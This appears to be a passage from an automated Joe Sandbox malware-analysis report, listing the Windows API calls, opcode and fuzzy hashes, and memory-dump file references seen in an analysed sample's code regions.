                Similarity
                • API ID: FileModuleName$LoadQueryStringVirtual
                • String ID:
                • API String ID: 3990497365-0
                • Opcode ID: aac2f17f211abb2ef035dde310232569af58e6d8d77e7884aff37113d15654a5
                • Instruction ID: 8d538054de17605590b94e0cea873e9b9764a595ebf2ba1f1a0e9dd63b358661
                • Opcode Fuzzy Hash: aac2f17f211abb2ef035dde310232569af58e6d8d77e7884aff37113d15654a5
                • Instruction Fuzzy Hash: 3A411E7CE402589FDB21DB68DC88BEAB7FDAB08305F0440E5A548E7251DB74AF888F51
                APIs
                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0286ACD9
                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0286ACFD
                • GetModuleFileNameA.KERNEL32(02860000,?,00000105), ref: 0286AD18
                • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0286ADAE
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: FileModuleName$LoadQueryStringVirtual
                • String ID:
                • API String ID: 3990497365-0
                • Opcode ID: 0140a93d272522d562e74cbc9d2de7dcc01ca45e8cfe8515f83d4c544e1ea095
                • Instruction ID: 161ab1d27d5e1a103db266d9fa77c5e34e263ca0979963fffb684722339bdef2
                • Opcode Fuzzy Hash: 0140a93d272522d562e74cbc9d2de7dcc01ca45e8cfe8515f83d4c544e1ea095
                • Instruction Fuzzy Hash: DD41127CE402589FDB21DB68DC88BEAB7FDAB08305F4440E5A548E7251DB74AF888F51
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c39f6458287cc24c0de3282331ff0e477dffdc412f6e4aedefebbdffe886f19b
                • Instruction ID: 61ef12aee34f3dfc9b8199f012f6b3223c89da95f7d41e97516f3e244bc73f3c
                • Opcode Fuzzy Hash: c39f6458287cc24c0de3282331ff0e477dffdc412f6e4aedefebbdffe886f19b
                • Instruction Fuzzy Hash: 40A1E7AE7106000BD719AA7CAC8C3BDB3C29BC4325F18827EE21DCB787EB64C9558755
                APIs
                • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0286955A), ref: 028694F2
                • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0286955A), ref: 028694F8
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: DateFormatLocaleThread
                • String ID: yyyy
                • API String ID: 3303714858-3145165042
                • Opcode ID: 09eb3019615ec1c2e5dbc32b64ded948c3e3f4a3a7359ab8713cd9da2a267437
                • Instruction ID: 78e04dce06fc05d098b42eb87c6f6be2591ffb35d1614a5af2cf868c97e4b97b
                • Opcode Fuzzy Hash: 09eb3019615ec1c2e5dbc32b64ded948c3e3f4a3a7359ab8713cd9da2a267437
                • Instruction Fuzzy Hash: D721917DA002189FDB11DFA8C849ABEB3F9EF08710F4040A5E909E7290D774DE44CB66
                APIs
                • IsBadReadPtr.KERNEL32(?,00000004), ref: 0287AD90
                • IsBadWritePtr.KERNEL32(?,00000004), ref: 0287ADC0
                • IsBadReadPtr.KERNEL32(?,00000008), ref: 0287ADDF
                • IsBadReadPtr.KERNEL32(?,00000004), ref: 0287ADEB
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: Read$Write
                • String ID:
                • API String ID: 3448952669-0
                • Opcode ID: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                • Instruction ID: 56e0f35520317531f08defd7d6c99096b8db99ce1aa079e8cd3fbefcf1b7c1d5
                • Opcode Fuzzy Hash: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                • Instruction Fuzzy Hash: 4C21AFBD6402199BDB14DF29CC80BAE7BA9EF40321F008112EE54D7380EB38E9119AE0